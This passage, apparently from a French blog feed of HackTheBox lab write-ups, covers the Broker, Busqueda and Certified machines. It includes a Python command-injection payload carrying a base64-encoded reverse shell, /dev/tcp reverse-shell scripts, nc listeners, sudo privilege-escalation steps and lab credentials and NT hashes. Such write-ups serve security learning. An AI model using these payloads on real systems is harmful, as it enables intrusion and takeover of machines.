class="line"><span class="cl">10.10.11.243 - - <span class="o">[</span>12/Dec/2024 00:19:59<span class="o">]</span> <span class="s2">&#34;GET /poc-linux.xml HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl">10.10.11.243 - - <span class="o">[</span>12/Dec/2024 00:19:59<span class="o">]</span> <span class="s2">&#34;GET /test.elf HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl">10.10.11.243 - - <span class="o">[</span>12/Dec/2024 00:20:15<span class="o">]</span> <span class="s2">&#34;GET /poc-linux.xml HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl">10.10.11.243 - - <span class="o">[</span>12/Dec/2024 00:20:15<span class="o">]</span> <span class="s2">&#34;GET /poc-linux.xml HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl">10.10.11.243 - - <span class="o">[</span>12/Dec/2024 00:20:15<span class="o">]</span> <span class="s2">&#34;GET /test.elf HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">8888</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat ~/user.tdxt </span></span><span class="line"><span class="cl">cat: /home/activemq/user.tdxt: No such file or directory </span></span><span class="line"><span class="cl">activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat ~/user.txt </span></span><span class="line"><span class="cl">9e54.....9a86 </span></span><span class="line"><span class="cl">activemq@broker:/opt/apache-activemq-5.15.15/bin$ </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="nginx-as-root">nginx as root </h3><p>En faisant sudo -l, on observe que l&rsquo;on peut executer la commande <code>nginx</code> en tant que root. Avec cette commande, on peut relancer un deuxieme serveur nginx sur un autre port en lui passant un nouveau fichier de configuration. La méthode, consiste donc à modifier l&rsquo;utilisateur dans le fichier de configuration pour que l&rsquo;interaction avec les fichiers se fassent en tant que root.</p> <p>Si on se connecte en HTTP à l&rsquo;ip du serveur avec le port défini dans la configuration nous allons pouvoir ouvrir tous les fichiers de l&rsquo;ordinateur, et donc notamment le fichier <code>root.txt</code> contenant le flag.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">...................... </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/busqueda-htb/Wed, 11 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/busqueda-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Busqueda cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Busqueda</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.208</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap -sC -sV -An -p- 10.10.11.208 </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.4.52 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.52 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://searcher.htb/ </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="python-command-injection">Python Command injection </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## exploit</span> </span></span><span class="line"><span class="cl"><span class="s1">&#39;,__import__(&#39;</span>os<span class="s1">&#39;).system(&#39;</span><span class="nb">echo</span> c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTAvOTAwMSAwPiYx <span class="p">|</span> base64 -d <span class="p">|</span> bash -i<span class="err">&#39;</span><span class="o">))</span> <span class="c1"># junky comment</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">svc@busqueda:~$ cat user.txt </span></span><span class="line"><span class="cl">afb3.....29e5 </span></span></code></pre></td></tr></table> </div> </div><h3 id="gitea--svc-password">Gitea : svc password </h3><p>On peut voir que l&rsquo;application a un .git et est donc un repo git. On recupère le lien vers le serveur gitea.searcher.htb. Dans le fichier de config de .git on trouve des credentials pour le nouveau site web découvert qui tourne sur le port 3000</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc@busqueda:/var/www/app$ git log </span></span><span class="line"><span class="cl">commit 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 <span class="o">(</span>HEAD -&gt; main, origin/main<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Author: administrator &lt;administrator@gitea.searcher.htb&gt; <span class="c1"># &lt;---------------- &#34;gitea.searcher.htb&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Date: Sun Dec <span class="m">25</span> 12:14:21 <span class="m">2022</span> +0000 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Initial commit </span></span><span class="line"><span class="cl">svc@busqueda:/var/www/app/$ <span class="nb">cd</span> .git </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## credentials</span> </span></span><span class="line"><span class="cl">svc@busqueda:/var/www/app/.git$ cat config </span></span><span class="line"><span class="cl"><span class="o">[</span>core<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">repositoryformatversion</span> <span class="o">=</span> <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="nv">filemode</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"> <span class="nv">bare</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"> <span class="nv">logallrefupdates</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>remote <span class="s2">&#34;origin&#34;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">url</span> <span class="o">=</span> http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git </span></span><span class="line"><span class="cl"> <span class="nv">fetch</span> <span class="o">=</span> +refs/heads/*:refs/remotes/origin/* </span></span><span class="line"><span class="cl"><span class="o">[</span>branch <span class="s2">&#34;main&#34;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">remote</span> <span class="o">=</span> origin </span></span><span class="line"><span class="cl"> <span class="nv">merge</span> <span class="o">=</span> refs/heads/main </span></span></code></pre></td></tr></table> </div> </div><p>En vérité j&rsquo;ai trouvé les creds comme ça:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> grep -rni <span class="s2">&#34;gitea&#34;</span> </span></span><span class="line"><span class="cl">app/.git/logs/HEAD:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator &lt;administrator@gitea.searcher.htb&gt; <span class="m">1671970461</span> +0000 commit <span class="o">(</span>initial<span class="o">)</span>: Initial commit </span></span><span class="line"><span class="cl">app/.git/logs/refs/heads/main:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator &lt;administrator@gitea.searcher.htb&gt; <span class="m">1671970461</span> +0000 commit <span class="o">(</span>initial<span class="o">)</span>: Initial commit </span></span><span class="line"><span class="cl">app/.git/logs/refs/remotes/origin/main:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator &lt;administrator@gitea.searcher.htb&gt; <span class="m">1671970461</span> +0000 update by push </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## ICI</span> </span></span><span class="line"><span class="cl">app/.git/config:7: <span class="nv">url</span> <span class="o">=</span> http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git </span></span></code></pre></td></tr></table> </div> </div><p>User: <code>cody</code>:<code>jh1usoih2bkjaspwe92</code></p> <p>On essaye de se connecter en ssh avec cody, puis avec svc et le password de cody, et ca fonctionne !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ssh svc@10.10.11.208 </span></span></code></pre></td></tr></table> </div> </div><h2 id="root-privilege-escalation">Root Privilege Escalation </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> svc on busqueda: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User svc may run the following commands on busqueda: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> /usr/bin/python3 /opt/scripts/system-checkup.py * </span></span></code></pre></td></tr></table> </div> </div><p>On peut voir que lorsqu&rsquo;on execute system-checkup on peut voir des containers docker, et envoyer des commande spour obtenir plus d&rsquo;informations</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py aaaa </span></span><span class="line"><span class="cl">Usage: /opt/scripts/system-checkup.py &lt;action&gt; <span class="o">(</span>arg1<span class="o">)</span> <span class="o">(</span>arg2<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> docker-ps : List running docker containers </span></span><span class="line"><span class="cl"> docker-inspect : Inpect a certain docker container </span></span><span class="line"><span class="cl"> full-checkup : Run a full system checkup </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps </span></span><span class="line"><span class="cl">CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES </span></span><span class="line"><span class="cl">960873171e2e gitea/gitea:latest <span class="s2">&#34;/usr/bin/entrypoint…&#34;</span> <span class="m">23</span> months ago Up <span class="m">7</span> hours 127.0.0.1:3000-&gt;3000/tcp, 127.0.0.1:222-&gt;22/tcp gitea </span></span><span class="line"><span class="cl">f84a6b33fb5a mysql:8 <span class="s2">&#34;docker-entrypoint.s…&#34;</span> <span class="m">23</span> months ago Up <span class="m">7</span> hours 127.0.0.1:3306-&gt;3306/tcp, 33060/tcp mysql_db </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect <span class="s1">&#39;{{json .Config.Env}}&#39;</span> mysql_db </span></span><span class="line"><span class="cl"><span class="o">[</span><span class="s2">&#34;MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF&#34;</span>,<span class="s2">&#34;MYSQL_USER=gitea&#34;</span>,<span class="s2">&#34;MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh&#34;</span>,<span class="s2">&#34;MYSQL_DATABASE=gitea&#34;</span>,<span class="s2">&#34;PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&#34;</span>,<span class="s2">&#34;GOSU_VERSION=1.14&#34;</span>,<span class="s2">&#34;MYSQL_MAJOR=8.0&#34;</span>,<span class="s2">&#34;MYSQL_VERSION=8.0.31-1.el8&#34;</span>,<span class="s2">&#34;MYSQL_SHELL_VERSION=8.0.31-1.el8&#34;</span><span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve le mot de passe root dans les variables d&rsquo;environnement du docker mysql.</p> <p>Ce mot de passe peut etre utilisé pour le compte <code>administrator</code> sur le site web gitea.searcher.htb !</p> <p>On peut voir un nouveau repo git avec le code complet du fameux script system-checkup.py</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc@busqueda:~$ vim full-checkup.sh </span></span><span class="line"><span class="cl"><span class="c1">##!/bin/bash</span> </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup </span></span><span class="line"><span class="cl">52e6.....04a7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Done ! </span></span></code></pre></td></tr></table> </div> </div><p>On peut aussi utiliser un reverse shell avec ce code pour <code>full-checkup.sh</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">##!/bin/bash</span> </span></span><span class="line"><span class="cl">sh -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.16.10/9001 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/certified-htb/Wed, 11 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/certified-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Certified cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Certified</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.41</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">User : judith.mader, Password : judith09 </span></span><span class="line"><span class="cl">User : management_svc, NT <span class="nb">hash</span> : a091c1832bcdd4677c28b5a6a1295584 </span></span><span class="line"><span class="cl">User : ca_operator, NT <span class="nb">hash</span> : 94994b74f29662fc4d702f2f3b0df327 </span></span><span class="line"><span class="cl">User : Administrator, LM/NT <span class="nb">hash</span> : aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap 10.10.11.41 -Pn </span></span><span class="line"><span class="cl">Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-12-08 14:07 CET </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.41 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.060s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">992</span> filtered ports </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">53/tcp open domain </span></span><span class="line"><span class="cl">135/tcp open msrpc </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds </span></span><span class="line"><span class="cl">464/tcp open kpasswd5 </span></span><span class="line"><span class="cl">636/tcp open ldapssl </span></span><span class="line"><span class="cl">3269/tcp open globalcatLDAPssl </span></span></code></pre></td></tr></table> </div> </div><h3 id="enumerating-users---smb">Enumerating Users - smb </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nxc smb 10.10.11.41 -u <span class="s1">&#39;judith.mader&#39;</span> -p <span class="s1">&#39;judith09&#39;</span> -d <span class="s1">&#39;certified.htb&#39;</span> --rid-brute </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:certified.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> certified.htb<span class="se">\j</span>udith.mader:judith09 </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 498: CERTIFIED<span class="se">\E</span>nterprise Read-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 500: CERTIFIED<span class="se">\A</span>dministrator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 501: CERTIFIED<span class="se">\G</span>uest <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 502: CERTIFIED<span class="se">\k</span>rbtgt <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 512: CERTIFIED<span class="se">\D</span>omain Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 513: CERTIFIED<span class="se">\D</span>omain Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 514: CERTIFIED<span class="se">\D</span>omain Guests <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 515: CERTIFIED<span class="se">\D</span>omain Computers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 516: CERTIFIED<span class="se">\D</span>omain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 517: CERTIFIED<span class="se">\C</span>ert Publishers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 518: CERTIFIED<span class="se">\S</span>chema Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 519: CERTIFIED<span class="se">\E</span>nterprise Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 520: CERTIFIED<span class="se">\G</span>roup Policy Creator Owners <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 521: CERTIFIED<span class="se">\R</span>ead-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 522: CERTIFIED<span class="se">\C</span>loneable Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 525: CERTIFIED<span class="se">\P</span>rotected Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 526: CERTIFIED<span class="se">\K</span>ey Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 527: CERTIFIED<span class="se">\E</span>nterprise Key Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 553: CERTIFIED<span class="se">\R</span>AS and IAS Servers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 571: CERTIFIED<span class="se">\A</span>llowed RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 572: CERTIFIED<span class="se">\D</span>enied RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1000: CERTIFIED<span class="se">\D</span>C01$ <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1101: CERTIFIED<span class="se">\D</span>nsAdmins <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1102: CERTIFIED<span class="se">\D</span>nsUpdateProxy <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1103: CERTIFIED<span class="se">\j</span>udith.mader <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1104: CERTIFIED<span class="se">\M</span>anagement <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1105: CERTIFIED<span class="se">\m</span>anagement_svc <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1106: CERTIFIED<span class="se">\c</span>a_operator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1601: CERTIFIED<span class="se">\a</span>lexander.huges <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1602: CERTIFIED<span class="se">\h</span>arry.wilson <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1603: CERTIFIED<span class="se">\g</span>regory.cameron <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="bloodhound-python">Bloodhound-python </h3><p>On execute bloodhound-python pour récupérer des données sur l&rsquo;Active directory.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span 